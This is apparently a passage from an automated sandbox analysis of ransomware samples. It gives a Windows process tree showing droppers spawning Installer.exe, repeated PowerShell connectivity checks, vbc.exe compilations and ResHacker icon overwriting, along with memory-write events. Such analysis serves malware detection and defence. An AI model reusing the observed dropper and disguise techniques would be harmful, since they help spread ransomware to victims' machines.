HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe 114 PID 3660 wrote to memory of 3468 3660 HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe 114 PID 3660 wrote to memory of 3468 3660 HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe 114 PID 1428 wrote to memory of 2612 1428 owxJMykQ.exe 116 PID 1428 wrote to memory of 2612 1428 owxJMykQ.exe 116 PID 1428 wrote to memory of 2612 1428 owxJMykQ.exe 116 PID 2220 wrote to memory of 2416 2220 cmd.exe 117 PID 2220 wrote to memory of 2416 2220 cmd.exe 117 PID 1428 wrote to memory of 3496 1428 owxJMykQ.exe 578 PID 1428 wrote to memory of 3496 1428 owxJMykQ.exe 578 PID 1456 wrote to memory of 4188 1456 HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe 118 PID 1456 wrote to memory of 4188 1456 HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe 118 PID 1456 wrote to memory of 4188 1456 HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe 118 PID 3784 wrote to memory of 1884 3784 HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe 122 PID 3784 wrote to memory of 1884 3784 HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe 122 PID 3784 wrote to memory of 1328 3784 HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe 123 PID 3784 wrote to memory of 1328 3784 HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe 123 PID 2220 wrote to memory of 4016 2220 cmd.exe 125 PID 2220 wrote to memory of 4016 2220 cmd.exe 125 PID 2220 wrote to memory of 4016 2220 cmd.exe 125 PID 2416 wrote to memory of 4208 2416 HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe 127 PID 2416 wrote to memory of 4208 2416 HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe 127 PID 2416 wrote to memory of 4208 2416 HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe 127 PID 2612 wrote to memory of 2604 2612 Installer.exe 128 PID 2612 wrote to memory of 2604 2612 Installer.exe 128 PID 2612 wrote to memory of 2604 2612 Installer.exe 128 PID 3496 wrote to memory of 4716 3496 vbc.exe 129 PID 3496 wrote to memory of 4716 3496 vbc.exe 129 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 8372 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00459.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\Installer.exe"C:\Users\Admin\AppData\Local\Temp\Installer.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com5⤵PID:3000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:6600
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:6372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com5⤵PID:8132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:8628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com5⤵PID:5628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:4032
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com5⤵PID:452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:2316
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com5⤵PID:8228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:8612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:3004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6752
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:8068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com5⤵PID:1140
-
-
-
C:\Users\Admin\Desktop\00459\owxJMykQ.exe"C:\Users\Admin\Desktop\00459\owxJMykQ.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\Installer.exe"C:\Users\Admin\AppData\Local\Temp\Installer.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:6836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:6264
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:3336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com6⤵PID:9204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:7648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com6⤵PID:8444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:3604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:8984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:3888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:4368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com6⤵PID:5372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:6516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com6⤵PID:5380
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\figrlwub\figrlwub.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES918D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc552F18BF5C054EE385B9F567E9D3EBA4.TMP"6⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe"C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe" -addoverwrite "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b..exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b...exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe.ico", ICONGROUP, MAINICON, 05⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 8086⤵
- Program crash
PID:5492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 8166⤵
- Program crash
PID:1184
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\t2yigl1o\t2yigl1o.cmdline"5⤵PID:5008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5420
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE38.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFF6B7C04A9AB45B0973DEA5F9974895A.TMP"6⤵PID:6588
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\astcnzpw\astcnzpw.cmdline"5⤵PID:1856
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE1D0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc76FD75A7F3D444492CD2FC913B2FF9A.TMP"6⤵PID:6812
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\stptnys5\stptnys5.cmdline"5⤵PID:6452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2452
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC11.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4DF4C27E21C54CD596F56C267D6E7AF9.TMP"6⤵PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe"C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe" -addoverwrite "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d..exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d...exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe.ico", ICONGROUP, MAINICON, 05⤵PID:7036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7036 -s 7806⤵
- Program crash
PID:5712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7036 -s 8206⤵
- Program crash
PID:6772
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ckjqw3u3\ckjqw3u3.cmdline"5⤵PID:6688
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES594.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC4CC51964704731A9B9EE1E9CA815F5.TMP"6⤵PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe"C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe" -addoverwrite "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706..exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706...exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706.exe.ico", ICONGROUP, MAINICON, 05⤵PID:2692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 7766⤵
- Program crash
PID:6724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 7966⤵
- Program crash
PID:116
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\eaa1kxmt\eaa1kxmt.cmdline"5⤵PID:5556
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17D4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc815C542A99904AC4A0BD6B4EDA159C.TMP"6⤵PID:6584
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qma33a00\qma33a00.cmdline"5⤵PID:6892
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B2F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3A121D0ABEFA4C1EB83BD3691BCEEA3F.TMP"6⤵PID:6096
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vturweih\vturweih.cmdline"5⤵PID:7592
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2188.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc23CA6BB03A5341509E65933213215B9.TMP"6⤵PID:7992
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dhi5efdz\dhi5efdz.cmdline"5⤵PID:7180
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A81.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFA334482580343A28B2F628B7CC27C8B.TMP"6⤵PID:7836
-
-
-
C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe"C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe" -addoverwrite "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7..exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7...exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7.exe.ico", ICONGROUP, MAINICON, 05⤵PID:7532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 7846⤵
- Program crash
PID:5692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 7646⤵
- Program crash
PID:6776
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rq0vz4tl\rq0vz4tl.cmdline"5⤵PID:5880
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4433.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc33A0E562ED224E08889C21140FBF73C.TMP"6⤵PID:6324
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gpezia1l\gpezia1l.cmdline"5⤵PID:5620
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46D3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC9F182DD92BB4D14A2ABBE2C2E8CF59.TMP"6⤵PID:5904
-
-
-
C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe"C:\Users\Admin\AppData\Local\Temp\ResHacker-RH.exe" -addoverwrite "C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db..exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db...exe","C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe.ico", ICONGROUP, MAINICON, 05⤵PID:5464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 7846⤵
- Program crash
PID:8132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 7926⤵
- Program crash
PID:6120
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\figejf1e\figejf1e.cmdline"5⤵PID:8848
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6018.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc78B57DB57B54451F9A18A8A29EE7797C.TMP"6⤵PID:8936
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3psrfuhw\3psrfuhw.cmdline"5⤵PID:8132
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES69CC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEBC542ED4AE849BE827473CF2BB4242D.TMP"6⤵PID:8264
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bbv3mcvs\bbv3mcvs.cmdline"5⤵PID:8524
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES718C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2A3F5A552C8449FFAC7CA8C9499EA8E2.TMP"6⤵PID:3496
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f3omtdb3\f3omtdb3.cmdline"5⤵PID:3516
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7834.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc492A4179FF60484FB194A47ACEF2C4EC.TMP"6⤵PID:3228
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vvykgyho\vvykgyho.cmdline"5⤵PID:5200
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8294.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6F7BB9C0BB9A483B8A3F696C293583C9.TMP"6⤵PID:7816
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vrfonjby\vrfonjby.cmdline"5⤵PID:3112
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B8D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc47606EEB52DA4046A8256D59D14FEB84.TMP"6⤵PID:8592
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xjzke1ca\xjzke1ca.cmdline"5⤵PID:9172
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC4B160CBA60E4F8E80BB7677CC2F8BDE.TMP"6⤵PID:1008
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ernri5bk\ernri5bk.cmdline"5⤵PID:2652
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9AEE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFC2634ED49884DEFA5306226822A583A.TMP"6⤵PID:5224
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4bxwyr3t\4bxwyr3t.cmdline"5⤵PID:7852
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0DA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6A66F52A255D4F16A379F1B59336038.TMP"6⤵PID:7956
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lrnrd4wx\lrnrd4wx.cmdline"5⤵PID:6452
-
